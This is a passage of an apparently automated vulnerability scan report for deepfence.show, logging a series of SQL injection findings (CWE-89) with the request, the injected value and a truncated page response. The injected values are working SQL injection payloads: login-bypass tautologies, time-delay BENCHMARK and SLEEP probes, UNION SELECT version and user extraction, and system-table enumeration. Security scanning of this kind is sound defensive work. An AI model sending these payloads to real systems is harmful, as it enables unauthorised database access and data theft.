href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #902\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #903\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #904\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #905\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #906\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #907\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #908\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #909\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #910Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #911\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #912\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #913\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #914\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #915\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' and 1 in (select min(name) from sysobjects where xtype \n= 'U' and name > '.') --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 